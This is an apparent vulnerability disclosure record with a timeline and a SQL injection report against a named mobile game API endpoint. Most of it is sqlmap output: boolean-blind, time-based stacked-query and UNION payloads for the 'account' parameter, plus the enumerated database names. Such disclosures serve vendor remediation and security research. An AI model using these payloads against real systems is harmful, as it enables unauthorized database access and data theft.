2015-07-28: Details have been sent to the vendor and are awaiting vendor handling
2015-07-28: Vendor has confirmed; details are disclosed to the vendor only
2015-08-07: Details disclosed to core white hats and experts in the relevant field
2015-08-17: Details disclosed to regular white hats
2015-08-27: Details disclosed to intern white hats
2015-09-11: Details disclosed to the public
http://api.m.uuzu.com/?account=e&c=api&device=android&event=recharge&game_id=93&m=select: account parameter issue (SQL injection, confirmed by the sqlmap output below)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: account=e' AND 2207=2207 AND 'kRuY'='kRuY&c=api&device=android&event=recharge&game_id=93&m=select

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: account=e';(SELECT * FROM (SELECT(SLEEP(5)))MVKJ)#&c=api&device=android&event=recharge&game_id=93&m=select

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: account=-8198' UNION ALL SELECT NULL,NULL,CONCAT(0x7162787a71,0x636f744f65546b4e6c4d,0x717a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- &c=api&device=android&event=recharge&game_id=93&m=select
---
web application technology: PHP 5.5.4
back-end DBMS: MySQL 5.0.11
available databases [9]:
[*] ad_android_analyze
[*] ad_android_log
[*] ad_ios_analyze
[*] ad_ios_log
[*] ad_mobile_base
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-07-28 12:15
Thanks for the submission.
None at present